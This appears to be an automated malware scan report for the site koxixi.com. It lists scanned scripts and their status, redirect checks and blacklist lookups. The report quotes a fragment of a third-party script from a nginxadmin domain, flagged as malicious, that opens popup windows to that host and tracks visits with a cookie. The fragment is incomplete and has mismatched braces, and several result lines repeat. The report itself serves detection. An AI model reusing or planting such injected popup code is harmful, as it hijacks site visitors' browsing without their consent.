Scanned pages/files
| Request | Server response | Status |
http://www.koxixi.com/ | 200 OK Content-Length: 67035 Content-Type: text/html | clean |
http://www.koxixi.com/data/config.js | 200 OK Content-Length: 100 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/jquery.min.js | 200 OK Content-Length: 30775 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/css.js | 200 OK Content-Length: 1728 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/common.js | 200 OK Content-Length: 10288 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/login.js | 200 OK Content-Length: 1011 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/images/js/validator.js | 200 OK Content-Length: 10398 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/mall/js/base64.js | 200 OK Content-Length: 78175 Content-Type: application/x-javascript | clean |
http://www.koxixi.com/mall/js/function.js | 200 OK Content-Length: 574 Content-Type: application/x-javascript | clean |
http://free.nginxadmin.net/free.js?v=20130821 | 200 OK Content-Length: 8247 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var oV1=window; function fStart(u,n,v){ if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) fV13(); var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)?wo.pw:wo; } function fV11(){ return fV6(vV1); } function fV5(x){ return true; } function oV2(u,n,v){ var c = vWA.length; vWA[c] = new Array; } } function nginxadmin_init( popurl, expire ){ if( nginxadmin_getcookie('nginxadmincookie') ) return; nginxadmin_setcookie( 'nginxadmincookie', "1", expire ); nginxadmin_poppage( popurl ); } var nginxadmin_expire = 3600000*24; var nginxadmin_popurl="http://free.nginxadmin.net/host.php?refer=free"; nginxadmin_init( nginxadmin_popurl, nginxadmin_expire ); Antivirus reports:
| ||
http://www.koxixi.com/data/js.php?id=1 | 200 OK Content-Length: 362 Content-Type: text/html | clean |
http://www.koxixi.com/test404page.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 17 Jun 2014 23:29:29 GMT Location: http://vip6.nginxadmin.com/404.html Content-Type: text/html X-Cache: miss X-Server: nanning01-cdn16.fhl | clean |
http://vip6.nginxadmin.com/404.html | HTTP/1.1 200 OK Connection: close Date: Tue, 17 Jun 2014 23:29:33 GMT Accept-Ranges: bytes Server: nginx/1.4.1 Content-Type: text/html | clean |
http://www.nginxadmin.net/?refer=vip6&type=404 | 502 Bad Gateway Content-Length: 574 Content-Type: text/html | clean |
http://www.nginxadmin.net/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: koxixi.com
Result:
GET / HTTP/1.1
Host: koxixi.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: koxixi.com
Referer: http://www.google.com/search?q=koxixi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: koxixi.com
Referer: http://www.google.com/search?q=koxixi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=koxixi.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://koxixi.com/
Result: koxixi.com is not infected or malware details are not published yet.
Result: koxixi.com is not infected or malware details are not published yet.